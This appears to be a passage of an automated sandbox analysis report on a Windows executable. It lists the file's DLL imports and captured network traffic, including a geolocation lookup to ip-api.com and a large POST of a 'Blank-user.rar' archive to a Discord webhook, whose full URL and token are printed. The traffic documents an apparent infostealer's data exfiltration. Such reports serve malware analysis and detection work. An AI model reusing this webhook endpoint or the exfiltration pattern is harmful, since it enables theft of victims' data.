                                                            KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 20, 2024 22:16:30.609232903 CEST4974280192.168.2.4208.95.112.1
                                                            Jul 20, 2024 22:16:30.614608049 CEST8049742208.95.112.1192.168.2.4
                                                            Jul 20, 2024 22:16:30.614850998 CEST4974280192.168.2.4208.95.112.1
                                                            Jul 20, 2024 22:16:30.614850998 CEST4974280192.168.2.4208.95.112.1
                                                            Jul 20, 2024 22:16:30.620229959 CEST8049742208.95.112.1192.168.2.4
                                                            Jul 20, 2024 22:16:31.112606049 CEST8049742208.95.112.1192.168.2.4
                                                            Jul 20, 2024 22:16:31.304709911 CEST4974280192.168.2.4208.95.112.1
                                                            Jul 20, 2024 22:16:31.376488924 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.376574039 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.376672029 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.397763968 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.397846937 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.882910013 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.883514881 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.883578062 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.885303974 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.885533094 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.886219978 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.886359930 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.886570930 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.886570930 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.886646032 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.886742115 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.886883020 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.886948109 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887100935 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887176037 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887315989 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887356997 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887425900 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887458086 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887491941 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887511969 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887540102 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887566090 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887579918 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887607098 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887640953 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887661934 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887701988 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887722969 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887748957 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887767076 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887797117 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887829065 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887893915 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887893915 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887917042 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887937069 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.887964964 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.887984991 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.888015032 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888030052 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.888067961 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888083935 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.888109922 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888127089 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.888147116 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888171911 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888186932 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.888226986 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888262033 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888293982 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888333082 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888351917 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888386965 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888386965 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888442039 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888477087 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888536930 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888583899 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888622046 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888622999 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888663054 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888699055 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.888725996 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898308039 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.898610115 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898701906 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.898772001 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898821115 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:31.898823977 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:31.898921013 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.816890955 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817123890 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817205906 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817362070 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:32.817399025 CEST44349743162.159.137.232192.168.2.4
                                                            Jul 20, 2024 22:16:32.817662954 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:32.818172932 CEST49743443192.168.2.4162.159.137.232
                                                            Jul 20, 2024 22:16:32.933613062 CEST4974280192.168.2.4208.95.112.1
                                                            Jul 20, 2024 22:16:32.939532995 CEST8049742208.95.112.1192.168.2.4
                                                            Jul 20, 2024 22:16:32.939750910 CEST4974280192.168.2.4208.95.112.1

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 20, 2024 22:16:30.599179983 CEST5309953192.168.2.41.1.1.1
                                                            Jul 20, 2024 22:16:30.608401060 CEST53530991.1.1.1192.168.2.4
                                                            Jul 20, 2024 22:16:31.365683079 CEST5102253192.168.2.41.1.1.1
                                                            Jul 20, 2024 22:16:31.375628948 CEST53510221.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jul 20, 2024 22:16:30.599179983 CEST192.168.2.41.1.1.10xf734Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:31.365683079 CEST192.168.2.41.1.1.10xa79fStandard query (0)canary.discord.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jul 20, 2024 22:16:23.395530939 CEST1.1.1.1192.168.2.40x1a0fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:23.395530939 CEST1.1.1.1192.168.2.40x1a0fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:30.608401060 CEST1.1.1.1192.168.2.40xf734No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:31.375628948 CEST1.1.1.1192.168.2.40xa79fNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:31.375628948 CEST1.1.1.1192.168.2.40xa79fNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:31.375628948 CEST1.1.1.1192.168.2.40xa79fNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:31.375628948 CEST1.1.1.1192.168.2.40xa79fNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                            Jul 20, 2024 22:16:31.375628948 CEST1.1.1.1192.168.2.40xa79fNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • canary.discord.com
                                                            • ip-api.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449742208.95.112.1807396C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 20, 2024 22:16:30.614850998 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                            Host: ip-api.com
                                                            Accept-Encoding: identity
                                                            User-Agent: python-urllib3/2.2.2
                                                            Jul 20, 2024 22:16:31.112606049 CEST379INHTTP/1.1 200 OK
                                                            Date: Sat, 20 Jul 2024 20:16:30 GMT
                                                            Content-Type: application/json; charset=utf-8
                                                            Content-Length: 202
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449743162.159.137.2324437396C:\Users\user\Desktop\e45AiBoV6X.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-20 20:16:31 UTC309OUTPOST /api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVMnWhurxQmS0fvG_72iP5niS7D08V HTTP/1.1
                                                            Host: canary.discord.com
                                                            Accept-Encoding: identity
                                                            Content-Length: 696330
                                                            User-Agent: python-urllib3/2.2.2
                                                            Content-Type: multipart/form-data; boundary=ee98191e18960bbd7c200f93a176e816
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: 2d 2d 65 65 39 38 31 39 31 65 31 38 39 36 30 62 62 64 37 63 32 30 30 66 39 33 61 31 37 36 65 38 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 0a da fd 71 21 04 00 00 01 0f 3f d9 cc df 5f a6 f8 b9 13 e1 2b 6a 9d 8c 83 3b aa d1 49 ae 19 11 10 3b 4f bd 9c b8 4e a8 7a 84 7f ef 62 49 90 bc cc d8 59 c0 33 7a dd 2c 81 98 1c 23 dc 7f d8 c9 b2 6b 29 c2 1f a0 a4 50 3b aa e0 34 c8 ce c9 2b 50 ea 1e 2f 85 08 a1 8d 55 9d 15 c6 ea 48 4f d3
                                                            Data Ascii: --ee98191e18960bbd7c200f93a176e816Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!q!?_+j;I;ONzbIY3z,#k)P;4+P/UHO
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: ec a0 88 52 32 1d 5e a6 8a 65 db ae 74 19 25 dd c0 3a e8 19 2b 12 60 27 7e 85 21 e0 bf d2 02 d0 bc 46 10 4b b2 b8 d4 5f 32 7b a2 5c a5 47 47 a3 66 b3 31 d5 b3 8d f1 e1 32 17 ef 14 c4 ae 7d 3c b6 b6 1c c0 64 06 b4 cd 14 c6 0f 2b c2 f0 d6 7c 26 f0 2d f4 d2 ab e6 f1 46 b4 63 da 31 89 bb 04 45 9e 6c 8e 38 bb eb e4 33 e6 85 e2 96 e7 54 ca a5 52 ce 2e b2 92 c2 b8 ca 48 53 01 90 51 e9 f0 7c 9e cc d4 ef aa 48 16 f6 8f 6c 96 f9 2c d4 11 54 3d 44 e8 24 23 3d c9 15 72 3f e2 a5 35 7f f2 fd e6 21 c0 d4 b1 e4 73 77 04 1a e6 ed 5e 50 e1 87 c1 9b b3 71 18 a0 c7 23 99 fb c9 bd 92 9d ea c6 35 0b 00 2c bb 4a 09 39 8e 1e f3 95 5e 69 36 93 a8 96 b5 f8 37 2a 74 cf d3 c3 7c 63 05 d1 7d 95 f5 1e 5c 82 1b 86 bf 0b eb 3c f7 de bb 4b 82 51 4b 84 13 11 dc 3a 47 ca 47 67 fc 6e 8b 57
                                                            Data Ascii: R2^et%:+`'~!FK_2{\GGf12}<d+|&-Fc1El83TR.HSQ|Hl,T=D$#=r?5!sw^Pq#5,J9^i67*t|c}\<KQK:GGgnW
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: 76 42 0f 9b 24 2e 2e 67 5b 55 bc f8 51 a2 b8 85 46 2b e4 85 57 be 5d 0e 66 9e 65 79 a5 f9 f0 36 5a 76 26 22 e0 d1 28 64 40 f1 76 da 38 42 9d ea 9a 97 25 b3 97 a9 07 3f 64 a0 4d 54 d3 89 db 00 2b ec b4 f1 ac 18 3c 02 f0 24 cb d2 cc c2 6c e1 2d 02 7e 7c b3 10 07 0a f2 3c 50 06 a6 5b 7e 56 eb 99 29 d5 3c 7f e5 14 06 3a 4d 8c 06 04 e5 b5 5e 8f c7 b7 1c da fa 4c d6 4c 96 4a 6a 96 09 c0 35 3b 7f c9 21 b2 71 0d a5 a4 72 b1 f4 b4 54 53 db 88 3a 6c 48 4e a8 c1 70 65 0e ea 13 05 e5 a4 bc 2d 6b f0 12 45 51 f1 61 41 96 f8 53 66 f5 5d 19 33 c5 bc 00 7b e3 d1 bb d8 25 ce 68 a3 90 a3 cc b9 1d 8f 8e 37 ed c9 d3 53 c7 d6 3a 2a 02 70 4c 0e b9 c9 66 b1 49 ce ba a3 68 49 d3 d4 6a 0e 5f 1f 11 55 e7 fe d0 c3 44 01 87 1b 6a 1a 42 03 0f d4 9d 90 ba a4 7a 60 c4 d6 ac ce 04 4f 5f
                                                            Data Ascii: vB$..g[UQF+W]fey6Zv&"(d@v8B%?dMT+<$l-~|<P[~V)<:M^LLJj5;!qrTS:lHNpe-kEQaASf]3{%h7S:*pLfIhIj_UDjBz`O_
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: c8 0d dc 3b f1 ba 7e 74 4c aa 7e 7f d5 c8 d7 3e ac f4 56 18 d5 21 21 e4 bb 9e 2d ca 3b f3 97 86 1d 17 13 bc ec f4 90 a1 7d c7 df 0d 98 fb d7 08 b3 fe db 98 32 9c 18 b3 14 02 77 a9 66 6c 40 1b 67 73 51 18 64 5b f9 d4 fe 0d d1 82 2a f5 e3 37 59 56 a5 45 ac d9 2c 51 d9 d9 64 a1 42 d2 ba 19 38 93 0e 21 cb 16 d1 01 7a e4 f7 f8 9c a1 06 48 25 e9 2b 7e b3 dc c2 0f 7c 57 8d 02 86 4d ca 61 b5 89 f7 a9 d9 0b 77 76 ca 67 d1 52 eb 53 89 32 d7 21 ec 38 27 1b cf 52 59 ba aa 90 84 20 a0 b9 5d de d5 7f f8 9c 3e 14 8a ef 53 5f 01 c2 48 d7 5a cb 25 a6 ee c0 5a 18 5c ed 46 61 03 18 b1 55 bc c4 f8 bd 74 d8 6b 6b 45 44 f7 e4 8d f3 2b 1c b1 b8 0b 14 76 29 c1 be b2 a9 2f 91 a1 8a 84 df d8 a8 6f 26 6c 48 91 6d 32 89 d8 70 ce 08 b7 12 22 61 7a d0 31 7b 91 67 11 46 3d e0 27 26 28
                                                            Data Ascii: ;~tL~>V!!-;}2wfl@gsQd[*7YVE,QdB8!zH%+~|WMawvgRS2!8'RY ]>S_HZ%Z\FaUtkkED+v)/o&lHm2p"az1{gF='&(
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: f0 69 90 2e 83 8f 37 83 bb e4 d5 63 04 51 02 6a ee de b0 82 81 c6 28 09 0d fd 2c 51 2a 23 70 04 3b 64 c7 71 b6 f0 d1 b4 3b 46 38 b9 39 26 a2 26 72 88 da 4c a9 e1 a7 5e b5 6c 4e 69 5c 2c d8 1b a6 a2 29 39 f0 d2 e4 fd 08 18 58 71 70 9d f0 3a c6 d5 41 03 8a 0a 2d 21 ad 72 eb 37 11 94 30 0d a9 a2 dd ef 67 25 33 db c8 6f aa 8e e4 ef f1 05 8f 1a d6 3b 05 8a a8 32 3e 12 53 8c 6f 31 c0 85 e1 d2 55 84 ec b8 97 75 fa e7 69 25 11 0a 60 df eb 0f fd f2 6d a4 0a 8f 83 79 bf 67 4c fc fa 38 58 27 2e 23 3f 8a bb 96 26 e4 b6 56 1a ea 32 95 3d 6d 8b 7d 65 d6 b8 62 21 24 19 74 41 7d 88 c5 4d b6 91 be 92 87 40 c2 81 08 19 06 3d e6 ae c4 14 cf d7 58 6f 3f 24 e4 4a 31 11 ec 8f 27 bb 70 92 92 00 58 79 78 aa 6e 29 7f 64 8a ac 4e 46 03 02 58 3d 6e 51 2e 52 dd 25 81 c0 ca 24 3a c1
                                                            Data Ascii: i.7cQj(,Q*#p;dq;F89&&rL^lNi\,)9Xqp:A-!r70g%3o;2>So1Uui%`mygL8X'.#?&V2=m}eb!$tA}M@=Xo?$J1'pXyxn)dNFX=nQ.R%$:
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: f3 7e c6 e2 d1 08 ef 55 5c fb 6a 25 36 4b 0c 20 41 8d 30 11 56 f3 73 e9 48 8a aa c0 60 31 89 6f cb a6 51 87 45 b1 bb 63 f6 b2 a0 bc 8e e8 50 89 88 a1 2a 0f 5d 72 d0 fd 0b dc 72 bd 44 0a d0 42 ed 75 f7 4b c0 a4 bd e6 b6 23 5a ce d2 30 9f 4c 81 20 93 fc 94 9d cc e4 fd c9 3e c7 1f 82 3a f0 fa d6 42 93 97 d5 75 53 c0 26 dd 73 97 43 24 f3 dd d7 da dc c6 bc e0 b5 f8 52 89 ce 50 d6 c7 2c 04 65 54 5b bd 78 b3 cd 76 3e a7 81 3a 56 ca 5b 17 92 63 27 f9 58 0e d4 fc 60 66 01 d4 0b cb 82 1c f7 91 f2 f1 4b 61 92 ef cb 6b ad 13 db 17 07 12 77 89 f7 2d 74 71 9a 2d 85 a0 f5 ee 71 6c e4 48 db 4a 9c 03 07 f3 cc 91 1b 61 98 7b 1a d8 aa 33 fc db df c1 38 1c d7 e3 4a 45 73 b9 d5 52 83 32 04 a7 02 9a 04 28 6a 9a fc e8 e4 1d ba 39 50 7e c5 49 a9 9e c9 5c 3c d3 68 e3 6f a9 ec 05
                                                            Data Ascii: ~U\j%6K A0VsH`1oQEcP*]rrDBuK#Z0L >:BuS&sC$RP,eT[xv>:V[c'X`fKakw-tq-qlHJa{38JEsR2(j9P~I\<ho
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: 26 84 34 4b e3 e5 04 1d 42 3e 20 db 06 38 8b 83 9d d7 c0 97 06 06 99 e1 6d db 8e e4 93 03 24 db ef ff 96 40 51 04 0e 69 eb 2b 28 2f 79 11 8c 75 c7 71 bf dc a3 11 28 20 cb 51 7d b5 12 4b fc 16 31 e9 c5 95 c4 b9 18 ac 84 0d fa 62 c9 c2 c2 f5 12 4d be 2b cc 6b 15 f2 2a 56 43 79 55 1d c0 b9 de ea 98 28 54 2f 9c 35 35 72 f5 62 46 1b 2c 70 78 eb e3 65 8c fc 74 3a 21 74 53 ad eb 2a e8 73 b9 d2 bd a6 09 cd 9e 95 5a 04 f7 59 c7 1c 19 44 99 c5 b2 e5 be 11 9c c8 4e 04 11 30 71 84 61 e0 81 c2 c2 0c 18 46 ec 4c 84 31 25 96 95 15 58 4e 7b 69 43 1c 92 9e 9c 37 b8 dc 2c d4 d4 bb a6 64 b4 e9 5b c6 7d 09 32 5f 71 50 55 b5 76 12 47 85 c3 09 0f 56 c3 6b ab 22 43 d2 b9 5f 72 c5 97 c9 ea f6 16 6c 42 de df dc df d2 c3 f4 6c 96 24 61 60 6f 22 76 dd ff a8 ba 5b 71 fa dd 2e 09 70
                                                            Data Ascii: &4KB> 8m$@Qi+(/yuq( Q}K1bM+k*VCyU(T/55rbF,pxet:!tS*sZYDN0qaFL1%XN{iC7,d[}2_qPUvGVk"C_rlBl$a`o"v[q.p
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: d6 ce b5 52 09 0c 3b 11 2d 59 93 0d d1 8c da 6b b8 13 4c 4f ce f7 57 c7 5d 7a 4d 90 a3 ad 66 05 70 45 ec 4d 23 2c e2 0c 76 86 31 db 3f 8d 24 a9 b5 d1 58 62 9f 4d 4a 15 71 6f 91 56 a0 7d e0 32 ba 74 9f 78 72 6b 96 88 fc fa a5 ee 32 b5 35 17 1e 08 f4 be aa 3c 5d 02 ca 9f 36 1d 37 42 05 de 8e e6 c4 c2 2c 07 5d 76 e2 2e 24 ea 62 68 8d af 06 d0 f0 3d c2 4f 87 19 ed d4 26 22 70 b4 c6 cb c0 9d 44 c3 a3 75 02 04 76 bf a7 ae 73 9a 97 f3 15 fe aa ba ef a4 ed e8 d5 5f 34 3b a5 15 2d ce dc 56 e7 42 f7 f0 b2 9d 35 32 47 89 9e 84 1c 27 4c b6 86 4c eb 06 b4 c8 9b 2c 18 f5 98 87 3b 63 d9 1a 84 d3 b1 e8 9a 2f b7 e7 d1 58 90 49 9d 66 ac 20 d4 73 e8 25 1c bb d0 98 f7 3c b1 82 71 cf 04 f4 7c 86 80 5a a2 3a ad 10 34 34 0f 2f d1 cc bb 34 59 0d d0 af 44 00 ba 9f e3 be f4 69 3f
                                                            Data Ascii: R;-YkLOW]zMfpEM#,v1?$XbMJqoV}2txrk25<]67B,]v.$bh=O&"pDuvs_4;-VB52G'LL,;c/XIf s%<q|Z:44/4YDi?
                                                            2024-07-20 20:16:31 UTC16384OUTData Raw: 53 f6 11 54 61 7e 5f 23 37 de 7f 7d b0 6c ac 45 b1 a7 d0 dd 0f db 46 e5 c0 8f 02 2d d3 3f 6a 92 13 49 c4 3d 06 57 92 92 63 6b b7 e9 ef 16 99 cd 28 c0 da 92 19 6a 11 cf 40 c3 34 b3 56 22 32 78 20 2f 58 55 5b e7 d4 8d 8a 9b 92 ce bd d0 f3 71 d9 a9 56 15 77 39 48 87 ef f7 0f 6e c4 11 eb 97 34 eb f2 f7 7b fc be d5 55 d0 dc 0f ee 13 d3 a6 9b ae 93 2e 4c 76 5f b4 79 ce 93 2e 7d f6 7d b4 b5 b2 1c 3f f0 49 f7 7b 53 63 4a 54 26 92 88 cd 22 77 3a 4b 65 7a 65 f3 91 a6 28 7f ec 15 a5 ba 05 9f 9f 4e 99 bc f5 31 24 92 14 09 4a 3c 80 de a7 2a 0c 99 72 e6 54 26 c2 b9 ae e9 72 3e c6 fe ba e9 07 8d a9 c4 e3 74 76 f8 eb 55 fe 10 45 42 30 a7 06 f7 d8 f4 70 4c 09 82 8c de 1f 1e 60 74 40 ea 56 64 18 95 e9 0a 91 d0 73 5f 68 d9 2b c9 57 0c 03 bd cf 7c 74 d9 b7 60 f6 76 10 78 43
                                                            Data Ascii: STa~_#7}lEF-?jI=Wck(j@4V"2x /XU[qVw9Hn4{U.Lv_y.}}?I{ScJT&"w:Keze(N1$J<*rT&r>tvUEB0pL`t@Vds_h+W|t`vxC
